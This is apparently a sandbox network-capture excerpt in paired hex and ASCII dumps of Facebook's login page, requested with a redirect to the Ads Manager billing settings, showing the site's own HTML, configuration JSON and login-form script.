                                                                                                                                  2022-10-17 20:07:22 UTC1356INData Raw: 63 6f 6d 2f 6c 6f 67 69 6e 2e 70 68 70 3f 6e 65 78 74 3d 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 25 32 46 61 64 73 25 32 46 6d 61 6e 61 67 65 72 25 32 46 61 63 63 6f 75 6e 74 5f 73 65 74 74 69 6e 67 73 25 32 46 61 63 63 6f 75 6e 74 5f 62 69 6c 6c 69 6e 67 22 20 2f 3e 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 6c 6f 63 61 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 65 6e 5f 55 53 22 20 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 63 61 6e 6f 6e 69 63 61 6c 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 2f 6c 6f 67 69 6e 2f 77 65 62 2f 22 20 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73
                                                                                                                                  Data Ascii: com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing" /><meta property="og:locale" content="en_US" /><link rel="canonical" href="https://www.facebook.com/login/web/" /><link rel="shortcut icon" href="https
                                                                                                                                  2022-10-17 20:07:22 UTC1357INData Raw: 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 2f 72 73 72 63 2e 70 68 70 2f 76 33 2f 79 53 2f 6c 2f 30 2c 63 72 6f 73 73 2f 74 35 5a 54 68 7a 32 42 34 77 4e 2e 63 73 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 20 64 61 74 61 2d 62 6f 6f 74 6c 6f 61 64 65 72 2d 68 61 73 68 3d 22 4b 41 6a 62 72 6c 2f 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 2f 72 73 72 63 2e 70 68 70 2f 76 33 2f 79 5f 2f 6c 2f 30 2c 63 72 6f 73 73 2f 76 63 50 71 54 69 52 77 49
                                                                                                                                  Data Ascii: ="https://static.xx.fbcdn.net/rsrc.php/v3/yS/l/0,cross/t5ZThz2B4wN.css?_nc_x=Ij3Wp8lg5Kz" data-bootloader-hash="KAjbrl/" crossorigin="anonymous" /><link type="text/css" rel="stylesheet" href="https://static.xx.fbcdn.net/rsrc.php/v3/y_/l/0,cross/vcPqTiRwI
                                                                                                                                  2022-10-17 20:07:22 UTC1359INData Raw: 34 30 22 3a 7b 22 72 65 73 75 6c 74 22 3a 66 61 6c 73 65 2c 22 68 61 73 68 22 3a 22 41 54 35 62 77 69 7a 57 67 44 61 46 51 75 64 6d 4a 7a 41 22 7d 2c 22 31 31 36 37 33 39 34 22 3a 7b 22 72 65 73 75 6c 74 22 3a 66 61 6c 73 65 2c 22 68 61 73 68 22 3a 22 41 54 37 42 70 4e 2d 74 6c 55 50 77 62 49 49 46 57 56 45 22 7d 2c 22 31 38 35 37 35 38 31 22 3a 7b 22 72 65 73 75 6c 74 22 3a 66 61 6c 73 65 2c 22 68 61 73 68 22 3a 22 41 54 35 79 54 78 47 4d 70 36 6c 65 30 50 41 74 6d 50 59 22 7d 2c 22 32 37 37 32 22 3a 7b 22 72 65 73 75 6c 74 22 3a 66 61 6c 73 65 2c 22 68 61 73 68 22 3a 22 41 54 35 45 75 32 34 34 57 49 63 65 37 69 77 71 57 6c 59 22 7d 2c 22 33 37 35 32 22 3a 7b 22 72 65 73 75 6c 74 22 3a 66 61 6c 73 65 2c 22 68 61 73 68 22 3a 22 41 54 36 65 53 35 55 54 6b
                                                                                                                                  Data Ascii: 40":{"result":false,"hash":"AT5bwizWgDaFQudmJzA"},"1167394":{"result":false,"hash":"AT7BpN-tlUPwbIIFWVE"},"1857581":{"result":false,"hash":"AT5yTxGMp6le0PAtmPY"},"2772":{"result":false,"hash":"AT5Eu244WIce7iwqWlY"},"3752":{"result":false,"hash":"AT6eS5UTk
                                                                                                                                  2022-10-17 20:07:22 UTC1360INData Raw: 67 22 2c 5b 5d 2c 7b 22 63 5f 75 73 65 72 22 3a 7b 22 73 22 3a 22 4e 6f 6e 65 22 7d 2c 22 63 70 70 6f 22 3a 7b 22 74 22 3a 38 36 34 30 30 2c 22 73 22 3a 22 4e 6f 6e 65 22 7d 2c 22 64 70 72 22 3a 7b 22 74 22 3a 36 30 34 38 30 30 2c 22 73 22 3a 22 4e 6f 6e 65 22 7d 2c 22 66 62 6c 5f 63 69 22 3a 7b 22 74 22 3a 33 31 35 33 36 30 30 30 2c 22 73 22 3a 22 4e 6f 6e 65 22 7d 2c 22 66 62 6c 5f 63 73 22 3a 7b 22 74 22 3a 33 31 35 33 36 30 30 30 2c 22 73 22 3a 22 4e 6f 6e 65 22 7d 2c 22 66 62 6c 5f 73 74 22 3a 7b 22 74 22 3a 33 31 35 33 36 30 30 30 2c 22 73 22 3a 22 53 74 72 69 63 74 22 7d 2c 22 69 5f 75 73 65 72 22 3a 7b 22 73 22 3a 22 4e 6f 6e 65 22 7d 2c 22 6c 6f 63 61 6c 65 22 3a 7b 22 74 22 3a 36 30 34 38 30 30 2c 22 73 22 3a 22 4e 6f 6e 65 22 7d 2c 22 6d 5f 6c
                                                                                                                                  Data Ascii: g",[],{"c_user":{"s":"None"},"cppo":{"t":86400,"s":"None"},"dpr":{"t":604800,"s":"None"},"fbl_ci":{"t":31536000,"s":"None"},"fbl_cs":{"t":31536000,"s":"None"},"fbl_st":{"t":31536000,"s":"Strict"},"i_user":{"s":"None"},"locale":{"t":604800,"s":"None"},"m_l
                                                                                                                                  2022-10-17 20:07:22 UTC1362INData Raw: 73 74 5f 62 61 73 65 5f 75 72 69 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 22 2c 22 6d 61 6e 69 66 65 73 74 5f 6f 72 69 67 69 6e 22 3a 6e 75 6c 6c 2c 22 62 65 5f 6f 6e 65 5f 61 68 65 61 64 22 3a 66 61 6c 73 65 2c 22 69 73 5f 72 74 6c 22 3a 66 61 6c 73 65 2c 22 69 73 5f 63 6f 6d 65 74 22 3a 66 61 6c 73 65 2c 22 69 73 5f 65 78 70 65 72 69 6d 65 6e 74 61 6c 5f 74 69 65 72 22 3a 66 61 6c 73 65 2c 22 69 73 5f 6a 69 74 5f 77 61 72 6d 65 64 5f 75 70 22 3a 74 72 75 65 2c 22 68 73 69 22 3a 22 37 31 35 35 35 37 35 34 36 38 34 31 37 37 34 36 32 37 33 22 2c 22 73 65 6d 72 5f 68 6f 73 74 5f 62 75 63 6b 65 74 22 3a 22 33 22 2c 22 62 6c 5f 68 61 73 68 5f 76 65 72 73 69 6f 6e 22 3a 32 2c 22 73 6b 69 70 5f 72 64 5f 62
                                                                                                                                  Data Ascii: st_base_uri":"https:\/\/static.xx.fbcdn.net","manifest_origin":null,"be_one_ahead":false,"is_rtl":false,"is_comet":false,"is_experimental_tier":false,"is_jit_warmed_up":true,"hsi":"7155575468417746273","semr_host_bucket":"3","bl_hash_version":2,"skip_rd_b
                                                                                                                                  2022-10-17 20:07:22 UTC1363INData Raw: 53 49 4e 45 53 53 5f 47 52 41 50 48 5f 53 45 54 54 49 4e 47 5f 57 41 42 41 5f 41 53 53 49 47 4e 45 44 5f 55 53 45 52 53 5f 4e 45 57 5f 41 50 49 22 2c 22 41 44 53 5f 50 4c 41 43 45 4d 45 4e 54 5f 46 49 58 5f 50 55 42 4c 49 53 48 45 52 5f 50 4c 41 54 46 4f 52 4d 53 5f 4d 55 54 41 54 49 4f 4e 22 2c 22 46 4f 52 43 45 5f 46 45 54 43 48 5f 42 4f 4f 53 54 45 44 5f 43 4f 4d 50 4f 4e 45 4e 54 5f 41 46 54 45 52 5f 41 44 53 5f 43 52 45 41 54 49 4f 4e 22 2c 22 56 49 44 45 4f 5f 44 49 4d 45 4e 53 49 4f 4e 53 5f 46 52 4f 4d 5f 50 4c 41 59 45 52 5f 49 4e 5f 55 50 4c 4f 41 44 5f 44 49 41 4c 4f 47 22 2c 22 53 4e 49 56 59 5f 47 52 4f 55 50 5f 42 59 5f 45 56 45 4e 54 5f 54 52 41 43 45 5f 49 44 5f 41 4e 44 5f 4e 41 4d 45 22 2c 22 41 44 53 5f 53 54 4f 52 45 5f 56 49 53 49 54
                                                                                                                                  Data Ascii: SINESS_GRAPH_SETTING_WABA_ASSIGNED_USERS_NEW_API","ADS_PLACEMENT_FIX_PUBLISHER_PLATFORMS_MUTATION","FORCE_FETCH_BOOSTED_COMPONENT_AFTER_ADS_CREATION","VIDEO_DIMENSIONS_FROM_PLAYER_IN_UPLOAD_DIALOG","SNIVY_GROUP_BY_EVENT_TRACE_ID_AND_NAME","ADS_STORE_VISIT
                                                                                                                                  2022-10-17 20:07:22 UTC1365INData Raw: 61 53 74 6f 72 65 43 6f 6e 66 69 67 22 2c 5b 5d 2c 7b 22 65 78 70 61 6e 64 6f 4b 65 79 22 3a 22 5f 5f 46 42 5f 53 54 4f 52 45 22 2c 22 75 73 65 45 78 70 61 6e 64 6f 22 3a 74 72 75 65 7d 2c 32 39 31 35 5d 2c 5b 22 43 6f 6f 6b 69 65 43 6f 72 65 4c 6f 67 67 69 6e 67 43 6f 6e 66 69 67 22 2c 5b 5d 2c 7b 22 6d 61 78 69 6d 75 6d 49 67 6e 6f 72 61 62 6c 65 53 74 61 6c 6c 4d 73 22 3a 31 36 2e 36 37 2c 22 73 61 6d 70 6c 65 52 61 74 65 22 3a 39 2e 37 65 2d 35 2c 22 73 61 6d 70 6c 65 52 61 74 65 43 6c 61 73 73 69 63 22 3a 31 2e 30 65 2d 31 30 2c 22 73 61 6d 70 6c 65 52 61 74 65 46 61 73 74 53 74 61 6c 65 22 3a 31 2e 30 65 2d 38 7d 2c 33 34 30 31 5d 2c 5b 22 49 6d 6d 65 64 69 61 74 65 49 6d 70 6c 65 6d 65 6e 74 61 74 69 6f 6e 45 78 70 65 72 69 6d 65 6e 74 73 22 2c 5b
                                                                                                                                  Data Ascii: aStoreConfig",[],{"expandoKey":"__FB_STORE","useExpando":true},2915],["CookieCoreLoggingConfig",[],{"maximumIgnorableStallMs":16.67,"sampleRate":9.7e-5,"sampleRateClassic":1.0e-10,"sampleRateFastStale":1.0e-8},3401],["ImmediateImplementationExperiments",[
                                                                                                                                  2022-10-17 20:07:22 UTC1366INData Raw: 6a 4a 66 65 4b 70 72 6c 55 55 4f 31 51 53 30 6f 45 71 5a 72 4e 56 22 2c 22 61 6c 6c 6f 77 6c 69 73 74 65 64 5f 69 66 72 61 6d 65 73 22 3a 5b 5d 7d 2c 35 35 34 30 5d 2c 5b 22 42 69 67 50 69 70 65 45 78 70 65 72 69 6d 65 6e 74 73 22 2c 5b 5d 2c 7b 22 6c 69 6e 6b 5f 69 6d 61 67 65 73 5f 74 6f 5f 70 61 67 65 6c 65 74 73 22 3a 66 61 6c 73 65 2c 22 65 6e 61 62 6c 65 5f 62 69 67 70 69 70 65 5f 70 6c 75 67 69 6e 73 22 3a 66 61 6c 73 65 7d 2c 39 30 37 5d 2c 5b 22 49 6e 74 6c 56 61 72 69 61 74 69 6f 6e 48 6f 6c 64 6f 75 74 22 2c 5b 5d 2c 7b 22 64 69 73 61 62 6c 65 5f 76 61 72 69 61 74 69 6f 6e 22 3a 66 61 6c 73 65 7d 2c 36 35 33 33 5d 2c 5b 22 41 73 79 6e 63 52 65 71 75 65 73 74 43 6f 6e 66 69 67 22 2c 5b 5d 2c 7b 22 72 65 74 72 79 4f 6e 4e 65 74 77 6f 72 6b 45 72
                                                                                                                                  Data Ascii: jJfeKprlUUO1QS0oEqZrNV","allowlisted_iframes":[]},5540],["BigPipeExperiments",[],{"link_images_to_pagelets":false,"enable_bigpipe_plugins":false},907],["IntlVariationHoldout",[],{"disable_variation":false},6533],["AsyncRequestConfig",[],{"retryOnNetworkEr
                                                                                                                                  2022-10-17 20:07:22 UTC1368INData Raw: 6f 6e 73 5f 61 6e 64 72 6f 69 64 2e 6a 73 6f 6e 22 3a 30 2c 22 5c 2f 63 6f 6e 6e 65 63 74 5c 2f 6a 73 64 69 61 6c 6f 67 5c 2f 4d 50 6c 61 74 66 6f 72 6d 41 70 70 49 6e 76 69 74 65 73 4a 53 44 69 61 6c 6f 67 5c 2f 22 3a 30 2c 22 5c 2f 63 6f 6e 6e 65 63 74 5c 2f 6a 73 64 69 61 6c 6f 67 5c 2f 4d 50 6c 61 74 66 6f 72 6d 4f 41 75 74 68 53 68 69 6d 4a 53 44 69 61 6c 6f 67 5c 2f 22 3a 30 2c 22 5c 2f 63 6f 6e 6e 65 63 74 5c 2f 6a 73 64 69 61 6c 6f 67 5c 2f 4d 50 6c 61 74 66 6f 72 6d 4c 69 6b 65 4a 53 44 69 61 6c 6f 67 5c 2f 22 3a 30 2c 22 5c 2f 71 70 5c 2f 69 6e 74 65 72 73 74 69 74 69 61 6c 5c 2f 22 3a 31 2c 22 5c 2f 71 70 5c 2f 61 63 74 69 6f 6e 5c 2f 72 65 64 69 72 65 63 74 5c 2f 22 3a 31 2c 22 5c 2f 71 70 5c 2f 61 63 74 69 6f 6e 5c 2f 63 6c 6f 73 65 5c 2f 22
                                                                                                                                  Data Ascii: ons_android.json":0,"\/connect\/jsdialog\/MPlatformAppInvitesJSDialog\/":0,"\/connect\/jsdialog\/MPlatformOAuthShimJSDialog\/":0,"\/connect\/jsdialog\/MPlatformLikeJSDialog\/":0,"\/qp\/interstitial\/":1,"\/qp\/action\/redirect\/":1,"\/qp\/action\/close\/"
                                                                                                                                  2022-10-17 20:07:22 UTC1494INData Raw: 72 74 65 72 5c 2f 22 3a 31 2c 22 5c 2f 63 72 2e 70 68 70 22 3a 31 2c 22 5c 2f 6c 65 67 61 6c 5c 2f 74 65 72 6d 73 5c 2f 22 3a 31 2c 22 5c 2f 6c 6f 67 69 6e 2e 70 68 70 22 3a 31 2c 22 5c 2f 6c 6f 67 69 6e 5c 2f 22 3a 31 2c 22 5c 2f 6d 6f 62 69 6c 65 5c 2f 61 63 63 6f 75 6e 74 5c 2f 22 3a 31 2c 22 5c 2f 6e 5c 2f 22 3a 31 2c 22 5c 2f 72 65 6d 6f 74 65 5f 74 65 73 74 5f 64 65 76 69 63 65 5c 2f 22 3a 31 2c 22 5c 2f 75 70 73 65 6c 6c 5c 2f 62 75 79 5c 2f 22 3a 31 2c 22 5c 2f 75 70 73 65 6c 6c 5c 2f 62 75 79 63 6f 6e 66 69 72 6d 5c 2f 22 3a 31 2c 22 5c 2f 75 70 73 65 6c 6c 5c 2f 62 75 79 72 65 73 75 6c 74 5c 2f 22 3a 31 2c 22 5c 2f 75 70 73 65 6c 6c 5c 2f 70 72 6f 6d 6f 73 5c 2f 22 3a 31 2c 22 5c 2f 75 70 73 65 6c 6c 5c 2f 63 6f 6e 74 69 6e 75 65 5c 2f 22 3a 31
                                                                                                                                  Data Ascii: rter\/":1,"\/cr.php":1,"\/legal\/terms\/":1,"\/login.php":1,"\/login\/":1,"\/mobile\/account\/":1,"\/n\/":1,"\/remote_test_device\/":1,"\/upsell\/buy\/":1,"\/upsell\/buyconfirm\/":1,"\/upsell\/buyresult\/":1,"\/upsell\/promos\/":1,"\/upsell\/continue\/":1
                                                                                                                                  2022-10-17 20:07:22 UTC1495INData Raw: 65 74 75 72 6e 20 49 6e 74 6c 56 61 72 69 61 74 69 6f 6e 73 2e 4e 55 4d 42 45 52 5f 4f 54 48 45 52 3b 20 7d 22 7d 2c 33 34 30 35 5d 2c 5b 22 53 65 72 76 65 72 54 69 6d 65 44 61 74 61 22 2c 5b 5d 2c 7b 22 73 65 72 76 65 72 54 69 6d 65 22 3a 31 36 36 36 30 33 37 32 34 32 37 32 33 2c 22 74 69 6d 65 4f 66 52 65 71 75 65 73 74 53 74 61 72 74 22 3a 31 36 36 36 30 33 37 32 34 32 37 30 34 2e 39 2c 22 74 69 6d 65 4f 66 52 65 73 70 6f 6e 73 65 53 74 61 72 74 22 3a 31 36 36 36 30 33 37 32 34 32 37 30 34 2e 39 7d 2c 35 39 34 33 5d 2c 5b 22 46 62 74 51 54 4f 76 65 72 72 69 64 65 73 22 2c 5b 5d 2c 7b 22 6f 76 65 72 72 69 64 65 73 22 3a 7b 7d 7d 2c 35 35 31 5d 2c 5b 22 41 6e 61 6c 79 74 69 63 73 43 6f 72 65 44 61 74 61 22 2c 5b 5d 2c 7b 22 64 65 76 69 63 65 5f 69 64 22
                                                                                                                                  Data Ascii: eturn IntlVariations.NUMBER_OTHER; }"},3405],["ServerTimeData",[],{"serverTime":1666037242723,"timeOfRequestStart":1666037242704.9,"timeOfResponseStart":1666037242704.9},5943],["FbtQTOverrides",[],{"overrides":{}},551],["AnalyticsCoreData",[],{"device_id"
                                                                                                                                  2022-10-17 20:07:22 UTC1497INData Raw: 74 35 53 48 4b 30 63 6b 22 5d 7d 2c 2d 31 5d 2c 5b 22 63 72 3a 38 39 36 34 36 32 22 2c 5b 22 73 65 74 49 6e 74 65 72 76 61 6c 41 63 72 6f 73 73 54 72 61 6e 73 69 74 69 6f 6e 73 42 6c 75 65 22 5d 2c 7b 22 5f 5f 72 63 22 3a 5b 22 73 65 74 49 6e 74 65 72 76 61 6c 41 63 72 6f 73 73 54 72 61 6e 73 69 74 69 6f 6e 73 42 6c 75 65 22 2c 22 41 61 32 30 6c 69 73 66 64 5f 79 44 46 55 72 5a 5a 5f 68 7a 79 6f 67 61 68 38 48 31 56 42 33 77 75 42 78 30 69 7a 70 4e 6d 4f 66 7a 4e 75 67 58 79 70 61 7a 53 77 48 35 53 2d 55 64 55 70 41 6a 43 46 77 42 77 51 2d 50 71 4e 6a 77 4e 63 74 66 47 32 6d 74 35 53 48 4b 30 63 6b 22 5d 7d 2c 2d 31 5d 2c 5b 22 63 72 3a 39 38 36 36 33 33 22 2c 5b 22 73 65 74 54 69 6d 65 6f 75 74 41 63 72 6f 73 73 54 72 61 6e 73 69 74 69 6f 6e 73 42 6c 75
                                                                                                                                  Data Ascii: t5SHK0ck"]},-1],["cr:896462",["setIntervalAcrossTransitionsBlue"],{"__rc":["setIntervalAcrossTransitionsBlue","Aa20lisfd_yDFUrZZ_hzyogah8H1VB3wuBx0izpNmOfzNugXypazSwH5S-UdUpAjCFwBwQ-PqNjwNctfG2mt5SHK0ck"]},-1],["cr:986633",["setTimeoutAcrossTransitionsBlu
                                                                                                                                  2022-10-17 20:07:22 UTC1498INData Raw: 6f 75 73 65 6f 76 65 72 22 3a 31 30 30 30 30 2c 22 6d 6f 75 73 65 6f 75 74 22 3a 31 30 30 30 30 2c 22 6d 6f 75 73 65 77 68 65 65 6c 22 3a 31 2c 22 4d 53 50 6f 69 6e 74 65 72 4d 6f 76 65 22 3a 31 30 30 30 30 2c 22 6b 65 79 64 6f 77 6e 22 3a 30 2e 31 2c 22 63 6c 69 63 6b 22 3a 30 2e 30 32 2c 22 6d 6f 75 73 65 75 70 22 3a 30 2e 30 32 2c 22 5f 5f 31 30 30 6d 73 22 3a 30 2e 30 30 31 2c 22 5f 5f 64 65 66 61 75 6c 74 22 3a 35 30 30 30 2c 22 5f 5f 6d 69 6e 22 3a 31 30 30 2c 22 5f 5f 69 6e 74 65 72 61 63 74 69 6f 6e 44 65 66 61 75 6c 74 22 3a 32 30 30 2c 22 5f 5f 65 76 65 6e 74 44 65 66 61 75 6c 74 22 3a 31 30 30 30 30 30 7d 2c 22 70 61 67 65 5f 73 61 6d 70 6c 69 6e 67 5f 62 6f 6f 73 74 22 3a 31 2c 22 69 6e 74 65 72 61 63 74 69 6f 6e 5f 72 65 67 65 78 65 73 22 3a
                                                                                                                                  Data Ascii: ouseover":10000,"mouseout":10000,"mousewheel":1,"MSPointerMove":10000,"keydown":0.1,"click":0.02,"mouseup":0.02,"__100ms":0.001,"__default":5000,"__min":100,"__interactionDefault":200,"__eventDefault":100000},"page_sampling_boost":1,"interaction_regexes":
                                                                                                                                  2022-10-17 20:07:22 UTC1500INData Raw: 61 78 2d 20 5f 39 61 78 5f 20 5f 39 61 79 31 20 55 49 50 61 67 65 5f 4c 6f 67 67 65 64 4f 75 74 20 68 61 73 42 61 6e 6e 65 72 20 5f 2d 6b 62 20 5f 36 30 35 61 20 62 5f 63 33 70 79 6e 2d 61 68 68 20 63 68 72 6f 6d 65 20 77 65 62 6b 69 74 20 77 69 6e 20 78 31 20 4c 6f 63 61 6c 65 5f 65 6e 5f 55 53 22 20 64 69 72 3d 22 6c 74 72 22 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 6e 6f 6e 63 65 3d 22 35 6e 51 58 75 57 53 55 22 3e 72 65 71 75 69 72 65 4c 61 7a 79 28 5b 22 62 6f 6f 74 73 74 72 61 70 57 65 62 53 65 73 73 69 6f 6e 22 5d 2c 66 75 6e 63 74 69 6f 6e 28 6a 29 7b 6a 28 31 36 36 36 30 33 37 32 34 32 29 7d 29 3c 2f 73 63 72 69 70 74 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 5f 6c 69 22 20 69 64 3d 22 75 5f 30
                                                                                                                                  Data Ascii: ax- _9ax_ _9ay1 UIPage_LoggedOut hasBanner _-kb _605a b_c3pyn-ahh chrome webkit win x1 Locale_en_US" dir="ltr"><script type="text/javascript" nonce="5nQXuWSU">requireLazy(["bootstrapWebSession"],function(j){j(1666037242)})</script><div class="_li" id="u_0
                                                                                                                                  2022-10-17 20:07:22 UTC1501INData Raw: 66 66 22 20 69 64 3d 22 65 72 72 6f 72 5f 62 6f 78 22 20 2f 3e 3c 64 69 76 20 69 64 3d 22 6c 6f 67 69 6e 66 6f 72 6d 22 3e 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 61 75 74 6f 63 6f 6d 70 6c 65 74 65 3d 22 6f 66 66 22 20 69 64 3d 22 64 69 73 70 6c 61 79 22 20 6e 61 6d 65 3d 22 64 69 73 70 6c 61 79 22 20 76 61 6c 75 65 3d 22 22 20 2f 3e 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 61 75 74 6f 63 6f 6d 70 6c 65 74 65 3d 22 6f 66 66 22 20 69 64 3d 22 69 73 70 72 69 76 61 74 65 22 20 6e 61 6d 65 3d 22 69 73 70 72 69 76 61 74 65 22 20 76 61 6c 75 65 3d 22 22 20 2f 3e 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 61 75 74 6f 63 6f 6d 70 6c 65 74 65 3d 22 6f 66 66 22 20 69 64 3d 22 72 65 74 75 72 6e 5f 73
                                                                                                                                  Data Ascii: ff" id="error_box" /><div id="loginform"><input type="hidden" autocomplete="off" id="display" name="display" value="" /><input type="hidden" autocomplete="off" id="isprivate" name="isprivate" value="" /><input type="hidden" autocomplete="off" id="return_s
                                                                                                                                  2022-10-17 20:07:22 UTC1503INData Raw: 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 61 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 5f 78 6b 74 22 3e 3c 62 75 74 74 6f 6e 20 76 61 6c 75 65 3d 22 31 22 20 63 6c 61 73 73 3d 22 5f 34 32 66 74 20 5f 34 6a 79 30 20 5f 35 32 65 30 20 5f 34 6a 79 36 20 5f 34 6a 79 31 20 73 65 6c 65 63 74 65 64 20 5f 35 31 73 79 22 20 69 64 3d 22 6c 6f 67 69 6e 62 75 74 74 6f 6e 22 20 6e 61 6d 65 3d 22 6c 6f 67 69 6e 22 20 74 61 62 69 6e 64 65 78 3d 22 30 22 20 74 79 70 65 3d 22 73 75 62 6d 69 74 22 3e 4c 6f 67 20 49 6e 3c 2f 62 75 74 74 6f 6e 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 5f 78 6b 76 20 66 73 6d 20 66 77 6e 20 66 63 67 22 20 69 64 3d 22 6c 6f 67 69 6e 5f 6c 69 6e 6b 22 3e 3c 61 20 68
                                                                                                                                  Data Ascii: div></div></a></div></div></div></div><div class="_xkt"><button value="1" class="_42ft _4jy0 _52e0 _4jy6 _4jy1 selected _51sy" id="loginbutton" name="login" tabindex="0" type="submit">Log In</button></div><div class="_xkv fsm fwn fcg" id="login_link"><a h
                                                                                                                                  2022-10-17 20:07:22 UTC1504INData Raw: 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 62 3d 67 65 28 22 65 6d 61 69 6c 22 29 2c 63 3d 67 65 28 22 70 61 73 73 22 29 3b 74 72 79 7b 62 26 26 21 62 2e 76 61 6c 75 65 3f 62 2e 66 6f 63 75 73 28 29 3a 63 26 26 63 2e 66 6f 63 75 73 28 29 7d 63 61 74 63 68 28 61 29 7b 69 66 28 21 28 61 2e 6e 75 6d 62 65 72 3d 3d 2d 32 31 34 36 38 32 36 31 37 38 29 29 74 68 72 6f 77 20 61 7d 72 65 74 75 72 6e 20 61 26 26 61 2e 63 61 6c 6c 28 77 69 6e 64 6f 77 29 7d 7d 28 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 29 3b 66 75 6e 63 74 69 6f 6e 20 70 6f 70 28 61 29 7b 77 69 6e 64 6f 77 2e 6f 70 65 6e 28 61 29 7d 66 75 6e 63 74 69 6f 6e 20 72 65 6c 6f 61 64 5f 6f 6e 5f 6e 65 77 5f 63 6f 6f 6b 69 65 28 61 29 7b 66 75 6e 63 74 69 6f 6e 20 62 28 61 29 7b 61
                                                                                                                                  Data Ascii: {return function(){var b=ge("email"),c=ge("pass");try{b&&!b.value?b.focus():c&&c.focus()}catch(a){if(!(a.number==-2146826178))throw a}return a&&a.call(window)}}(window.onload);function pop(a){window.open(a)}function reload_on_new_cookie(a){function b(a){a
                                                                                                                                  2022-10-17 20:07:22 UTC1506INData Raw: 6f 6f 6b 2e 63 6f 6d 2f 6c 6f 67 69 6e 2e 70 68 70 3f 6e 65 78 74 3d 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 25 32 46 61 64 73 25 32 46 6d 61 6e 61 67 65 72 25 32 46 61 63 63 6f 75 6e 74 5f 73 65 74 74 69 6e 67 73 25 32 46 61 63 63 6f 75 6e 74 5f 62 69 6c 6c 69 6e 67 22 20 6f 6e 63 6c 69 63 6b 3d 22 72 65 71 75 69 72 65 28 26 71 75 6f 74 3b 49 6e 74 6c 55 74 69 6c 73 26 71 75 6f 74 3b 29 2e 73 65 74 43 6f 6f 6b 69 65 4c 6f 63 61 6c 65 28 26 71 75 6f 74 3b 66 72 5f 46 52 26 71 75 6f 74 3b 2c 20 26 71 75 6f 74 3b 65 6e 5f 55 53 26 71 75 6f 74 3b 2c 20 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 66 72 2d 66 72 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 5c 2f 6c 6f 67 69 6e 2e 70 68 70 3f 6e 65 78 74 3d 68 74
                                                                                                                                  Data Ascii: ook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing" onclick="require(&quot;IntlUtils&quot;).setCookieLocale(&quot;fr_FR&quot;, &quot;en_US&quot;, &quot;https:\/\/fr-fr.facebook.com\/login.php?next=ht
                                                                                                                                  2022-10-17 20:07:22 UTC1507INData Raw: 50 6f 72 74 75 67 61 6c 29 22 3e 50 6f 72 74 75 67 75 c3 aa 73 20 28 50 6f 72 74 75 67 61 6c 29 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 63 6c 61 73 73 3d 22 5f 73 76 34 22 20 64 69 72 3d 22 6c 74 72 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 71 2d 61 6c 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 2f 6c 6f 67 69 6e 2e 70 68 70 3f 6e 65 78 74 3d 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 25 32 46 61 64 73 25 32 46 6d 61 6e 61 67 65 72 25 32 46 61 63 63 6f 75 6e 74 5f 73 65 74 74 69 6e 67 73 25 32 46 61 63 63 6f 75 6e 74 5f 62 69 6c 6c 69 6e 67 22 20 6f 6e 63 6c 69 63 6b 3d 22 72 65 71 75 69 72 65 28 26 71 75 6f 74 3b 49 6e 74 6c 55 74 69 6c 73 26 71 75 6f 74 3b 29 2e 73 65 74 43 6f 6f 6b 69 65 4c 6f
